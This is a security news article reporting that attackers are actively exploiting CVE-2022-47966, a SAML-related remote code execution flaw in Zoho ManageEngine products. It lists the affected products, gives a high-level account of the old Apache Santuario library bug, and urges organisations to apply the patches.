Users of on-premises deployments of Zoho ManageEngine products should make sure they have patches applied for a critical remote code execution vulnerability that attackers have now started exploiting in the wild.
Technical details about the flaw along with a proof-of-concept exploit was released late last week, which will allow more attackers to add this exploit to their arsenal.
"The vulnerability is easy to exploit and a good candidate for attackers to 'spray and pray' across the Internet," researchers with penetration testing firm Horizon3.ai said in a blog post.
"This vulnerability allows for remote code execution as NT AUTHORITY\SYSTEM, essentially giving an attacker complete control over the system. If a user determines they have been compromised, additional investigation is required to determine any damage an attacker has done."
Zoho released security updates during October and November for multiple products to address the flaw, which is now tracked as CVE-2022-47966.
However, the security advisory was only published this month and as of last week there were over 1,000 vulnerable instances of ManageEngine products directly exposed to the internet and probably many more inside large corporate networks.
SAML ShowStopper vulnerability
The vulnerability was found by a researcher named Khoadha, a.k.a. @_l0gg, from Vietnamese firm Viettel Cyber Security and was reported privately to Zoho through its bug bounty program in late October.
When ManageEngine issued its advisory on 10 January, researchers from Horizon3.ai investigated it and reverse-engineered the patch to create a working proof-of-concept exploit.
After giving the community a heads-up that the flaw is very serious and easy to exploit and sharing some IOCs that could enable exploit detection, they waited several days before publishing their findings. Khoadha came out with a detailed write-up at the same time.
The issue is located in old versions of a library called libxmlsec from the Apache Santuario open-source project.
The version of the library used in ManageEngine products was over a decade old. Newer versions are not affected because of security enhancements added over time, though Khoadha's findings are new.
Apache Santuario implements security standards for XML, primarily XML-Signature Syntax and Processing and XML Encryption Syntax and Processing. These are commonly used in Security Assertion Markup Language (SAML), a protocol that's popular in single sign-on (SSO) implementations to communicate between identity providers and service providers.
Enterprises use SAML to enable employees to use the same identity across different applications and services.
Zoho ManageEngine provides a suite of products for enterprises, many of which support SAML-based SSO. Some of the products are affected if they currently have SAML SSO enabled, while some are affected if they ever had it enabled in the past, even if they don't anymore. The affected products are:
- Access Manager Plus
- Active Directory 360
- ADAudit Plus
- ADManager Plus
- ADSelfService Plus
- Analytics Plus
- Application Control Plus
- Asset Explorer
- Browser Security Plus
- Device Control Plus
- Endpoint Central
- Endpoint Central MSP
- Endpoint DLP
- Key Manager Plus
- OS Deployer
- PAM 360
- Password Manager Pro
- Patch Manager Plus
- Remote Access Plus
- Remote Monitoring and Management (RMM)
- ServiceDesk Plus
- ServiceDesk Plus MSP
- SupportCenter Plus
- Vulnerability Manager Plus
"In summary, when Apache Santuario is <= v1.4.1, the vulnerability is trivially exploitable and made possible via several conditions: Reference validation is performed before signature validation, allowing for the execution of malicious XSLT transforms; Execution of XSLT transforms allows an attacker to execute arbitrary Java code," the Horizon3 researchers wrote in their analysis.
"This vulnerability is still exploitable even when Apache Santuario is between v1.4.1 and v2.2.3, which some of the affected ManageEngine products were using at the time, such as Password Manager Pro."
Even though the research was done on ManageEngine products, Khoadha warns in his own write-up that the flaw is not limited to them and products from other companies that use any of the impacted versions of libxmlsec for SAML could be similarly impacted. That's why he has dubbed the flaw as SAML ShowStopper.
Attackers are already exploiting the ManageEngine flaw
Researchers from security firm Rapid7 reported on January 19 that they already responded to compromises that resulted from exploitation of CVE-2022-47966.
The company later updated their advisory with indicators of compromise that they were seeing in the wild as well as MITRE ATT&CK techniques the attackers were using post exploitation. This includes using PowerShell to disable Windows Defender and deploying a tunnelling tool writer in Golang and called Chisel.
"Our vulnerability research team found during testing that some products may be more exploitable than others: ServiceDesk Plus, for instance, is easily exploitable with public proof-of-concept code, but ADSelfService Plus requires an attacker to obtain two additional pieces of information and modify the PoC for successful exploitation," the Rapid7 researchers said.
Security firm GreyNoise is also detecting exploitation attempts on its honeypots. Vulnerabilities that can be exploited for remote code execution without authentication and have a public proof-of-concept are usually quickly adopted by attackers so it is likely the number of attacks will only increase.
Organisations that don't directly expose any of these ManageEngine products to the internet should still apply the patches as soon as possible, because attackers can obtain network access in a variety of ways and this flaw can then be exploited for lateral movement.
Many ManageEngine products are used for security, identity management and authentication so they contain sensitive information.